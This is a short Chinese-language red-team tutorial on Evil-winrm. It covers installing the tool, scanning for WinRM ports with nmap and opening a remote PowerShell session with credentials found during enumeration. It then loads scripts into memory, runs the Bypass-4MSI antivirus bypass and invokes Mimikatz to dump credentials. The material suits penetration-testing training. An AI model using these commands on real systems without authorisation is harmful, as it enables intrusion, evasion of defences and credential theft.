红队神器Evil-winrm使用指南

Evil-winrm 是一款使用ruby 语言开发的开源工具。该工具具有许多很酷的功能，包括使用纯文本密码远程登录、SSL 加密登录、 NTLM 哈希登录、密钥登录、文件传输、日志存储等功能。使用 evil-winrm，我们可以获得远程主机的 PowerShell命令终端会话。同时此工具已在Kali Linux系统中集成。

其他系统安装

如果你的kali中没有安装， 我们可以用下面的命令进行安装。

apt-get install evil-winrm 

关于WinRM

Windows远程管理（WinRM）是Windows Server 2003 R2以上版本中一种新式的方便远程管理的服务。WinRM是远程管理应用的“服务器”组成部分，并且WinRS（Windows远程Shell）是WinRM的“客户端”，它在远程管理WinRM服务器的计算机上运行。然而，我们应该注意到两个计算机必须手动安装WinRS，还要使WinRM能够启动并从远程系统传回信息。

启用WinRM

在powershell窗口中(管理员身份运行)输入enable-psremoting，启用WinRM会话配置

或者，我们用nmap进行端口扫描检查。

nmap -p5985,5986 192.168.5.38

食用指南

假设我们在账户枚举阶段获得了明文密码，并且注意到远程主机启用了 winrm 服务 ，我们可以使用 evil-winrm 在目标系统上进行远程会话。命令如下：

evil-winrm -i 192.168.5.38 -u kali -p admin12345  

加载 Powershell 脚本

Evil-winrm 还提供了一项允许我们使用来自目标主机自带的powershell脚本的功能。可以直接将脚本加载到内存中 ，我们可以使用带有-s 参数接目标系统的powershell脚本的相对路径

evil-winrm -i 192.168.5.38 -u kali -p admin12345 -s /opt/privsc/powershell
Bypass-4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz

BREAK AWAY